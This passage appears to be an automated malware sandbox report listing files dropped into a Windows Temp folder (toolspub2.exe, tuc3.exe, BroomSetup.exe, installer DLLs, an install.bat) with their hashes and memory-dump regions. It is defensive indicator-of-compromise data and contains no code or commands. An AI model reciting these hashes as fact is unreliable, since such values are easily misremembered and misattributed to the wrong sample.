| SHA256 | 21ba4e176cef88d3f12e971bf5f32f332a5857b571019e4d3667a9b85247ec4e |
| SHA512 | b9c5579e0b745e2b892329f0d078cfa01ccae0c27df87f31850b348da8a7b6c0c9d2a9699359ef392765d1ad43f9e6098e22f101258f80f07debba8e40f5dbe8 |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | ed82c8b1405d74966ad67963743bf9e3 |
| SHA1 | e1159a02654fbc8be19f55ba9d8331d06bfdf421 |
| SHA256 | 696d43b65b6c11caa742d73beea9a92d8dfdeab70cec39c1cc08d2e9c89c8d4f |
| SHA512 | b18f5ea58764fa3c42941f46cdbc4f026839fc980735a0fb3bc25e1ace8413a4a188befb1deb27410f2cc273fd1c191f94936cd728f83f7ea56779ad313acb1c |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 96b48180e6b80d7e828e412b6b21576f |
| SHA1 | f130ab71166d8ac5dc5ec1cda56afa2acc8b9e56 |
| SHA256 | 5b85c1de86c15d1aa29ace1e9653ddec79f27c70c7939294736989cabccaaca1 |
| SHA512 | 90b58b30e65607f9cf8c3c7e0b418faf6c277eac27283c5e0887d24201214b8f475353f3087f3ba46315d7c3670712b84386d31d44045246dbea9f52410cc113 |
C:\Users\Admin\AppData\Local\Temp\nsh9D0.tmp\Math.dll
| MD5 | ebd8a7a5042ae1d4ce1aa9071859c851 |
| SHA1 | ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6 |
| SHA256 | fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837 |
| SHA512 | daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e |
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 9bd43ccef269e584af59af530c1e0a12 |
| SHA1 | c50015b357a4c15546d033fc82f0d757ad638097 |
| SHA256 | 54aa4a6765bda105aa813b676e484b29188d690e6a4cdf4382285aa39db08b37 |
| SHA512 | 68c4f251a8f9b05c7e473ea27463dd58957d072dec901ee4b17423f4e2522c90f58aa83e96a76c432c92adb9cf5d13eebb894b27cdf0fa8bd86c42190720201f |
C:\Users\Admin\AppData\Local\Temp\B39.exe
| MD5 | dc6fbf2cd9ad1f1f0ac200e9bec7ea3f |
| SHA1 | c3af9d82d270829784339331dea63f927400e0d4 |
| SHA256 | 2337b4b50924227e6f8772d9ce4b4bdbe6b8cfff15f493ea977e7c1280ad8590 |
| SHA512 | 39307ae10cd7db4ff6da65090bf86af362955c25793dcf60cff65892aa759d3befc1180ee9039f5611f2d8393848a4f265dd34dd690161488b99c2a30b4aae2f |
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | 5b03d4f455c64b6d3da634418b3a9693 |
| SHA1 | 285b8dfe363af4ccf41417f52c5bdf76550b84f8 |
| SHA256 | ec9563b238d2c81a497f535f159d4af60506972c6c0ec21d9b0cc3227adf5b96 |
| SHA512 | 272fc2dcb58cf86418de229bbe0e836a2c6ce378a5f6ae4006733b301d75654d4391093259aaf2c779b973aeeefeab7dd96d837352c0ddfc963f0b0acbada7b7 |
memory/4652-106-0x0000000000400000-0x0000000000418000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
| MD5 | e69ed4335ce94401642886f0189caa98 |
| SHA1 | 34a72fdfbcd1a0d6e2d998de5bfba641f7eabc5f |
| SHA256 | d7f6730b12cb246369f8b53c47e72545a52c30359d4b6d01e0e6aeefd6d6b54a |
| SHA512 | 94bace53f37416147f2d18fce9efd0d922e95681c7dac0d7a58ee8aa2f76529b5ec58c71df3d7f5de1077cb3bca0d8e7ba92387e987432c1ee1cc7a0c7ec3997 |
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
| MD5 | e8becd41e05c0d81bc99c204fe02f6ea |
| SHA1 | 9307a08031fe0d1064328cb387bc2c579cc152c8 |
| SHA256 | 8505920fc9333dfeedd83d56ec1071bf53d6d457e73d549eda929906a69f181a |
| SHA512 | 41e7a9f9d3a68f7bbe530f5060cd66cde25aa6385be579000fdcea3d670aef87d4de7cdf6ac7ba98f2c27a8760e5696a08a5da444891d6e675e86012c87eea44 |
memory/5096-109-0x0000000000AD0000-0x0000000000AD1000-memory.dmp
memory/4944-112-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 35559b537562ff22aa042b2f18c237d6 |
| SHA1 | 6fafb124c21b9125e9eb0884a3cfffee7eb87de3 |
| SHA256 | 6ea16efcd9f0e6c79681107156ad04b05f28bbab0983eadbe2fc6e584ccd4fbd |
| SHA512 | 8e57f3a7b41df5e1d677ce24b930926585d938e795c5d16e8ef0142d01f005beed8c4dc6363c45df1a842442384349536259fa0203d5061c04430362a18d99c4 |
memory/4944-117-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-OUMNA.tmp\tuc3.tmp
| MD5 | f70bdc96bef577c5ad7a6354ea7f4be1 |
| SHA1 | 730049666451ee74f769cfd69640645df3fcd360 |
| SHA256 | 1c54c47ed1cc78c6a4d06abd9ff071470e7c2c7fa9183f4e735e83264f369ad5 |
| SHA512 | 74696ccb073b74e088860d4f0ea6b78b9a05bb6cd0102db6de5bd6a49d385591872fc176aa003c4dd947c3d925c1d1512224bc11613c3d22a8c819d7fb75f790 |
C:\Users\Admin\AppData\Local\Temp\is-OUMNA.tmp\tuc3.tmp
| MD5 | b120b60e06de6da7ce4c721b5e6a945e |
| SHA1 | b8ede41718c1146587e14f16956fd6570c5b92ed |
| SHA256 | c719d7c6b6ced2da98f43a916535042dd3c4b28c70621d946f8b94fedee6b8bf |
| SHA512 | d7d7307a4c22703d74837c85acfac140747571dd5be175d12ee9f8bddc8160e10e819d3e10c562546d762a12415853c58b1b8e6b09154194f8a74f17ea282e79 |
memory/3832-111-0x0000000000980000-0x0000000000A80000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.bat
| MD5 | 60c9624e093baac4bef11ab4fc846111 |
| SHA1 | 07a25911c81e04608a0dc6fb065524a9da82dd65 |
| SHA256 | e60ede01e4c366eca01c0d420190370cb52fb239d508593b343912735ef51d1d |
| SHA512 | 14e031235f82bb93ba8044c2d39673094707814e67485d819eccad5d1aae972bfba6a12d7bb27d9f70e38a94c3f5152a3d49a799ca9501a64afb420bb280ff24 |
memory/3832-110-0x00000000008F0000-0x00000000008F9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-P8O7H.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
memory/4324-134-0x0000000074430000-0x0000000074BE0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-P8O7H.tmp\_isetup\_isdecmp.dll
| MD5 | 3adaa386b671c2df3bae5b39dc093008 |
| SHA1 | 067cf95fbdb922d81db58432c46930f86d23dded |
| SHA256 | 71cd2f5bc6e13b8349a7c98697c6d2e3fcdeea92699cedd591875bea869fae38 |
| SHA512 | bbe4187758d1a69f75a8cca6b3184e0c20cf8701b16531b55ed4987497934b3c9ef66ecd5e6b83c7357f69734f1c8301b9f82f0a024bb693b732a2d5760fd303 |
memory/396-135-0x0000000001FC0000-0x0000000001FC1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsh9D0.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\Local\Temp\nsh9D0.tmp\INetC.dll
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |